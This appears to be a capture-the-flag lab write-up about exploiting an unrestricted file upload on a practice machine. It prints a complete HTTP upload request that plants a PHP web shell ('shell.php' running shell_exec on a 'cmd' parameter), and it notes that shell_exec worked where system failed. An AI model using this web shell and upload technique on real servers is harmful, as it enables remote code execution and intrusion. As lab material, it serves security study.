Skip to main content

Unrestricted File Upload

As Paul, we have access to a file upload service to supposedly upload only zip files.

File upload

Of course, from the source code, we can obviously see that there are no upload restrictions at all. (Not even file type or file name)

Moreover, we control the file name to be uploaded in the task field. Using Burp Suite, we can send a PHP one liner to allow for remote code execution.

Upload malicious files#

POST /portal/includes/fileController.php HTTP/1.1Host: 10.10.10.228Content-Length: 338Accept: */*X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryHBZNum5szzVSddPnOrigin: http://10.10.10.228Referer: http://10.10.10.228/portal/php/files.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=paul47200b180ccd6835d25d034eeb6e6390; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoicGF1bCJ9fQ.7pc5S1P76YsrWhi_gu23bzYLYWxqORkr0WtEz_IUtCUConnection: close
------WebKitFormBoundaryHBZNum5szzVSddPnContent-Disposition: form-data; name="file"; filename="shell.php"Content-Type: application/x-httpd-php
<?php echo shell_exec($_GET['cmd']); ?>
------WebKitFormBoundaryHBZNum5szzVSddPnContent-Disposition: form-data; name="task"
nothing.php------WebKitFormBoundaryHBZNum5szzVSddPn--

Notes#

While I first tried to use the PHP system command, there seems to be an error when performing the upload. I suspect that system is not allowed by the PHP configuration.

Changing to shell_exec solves the issue.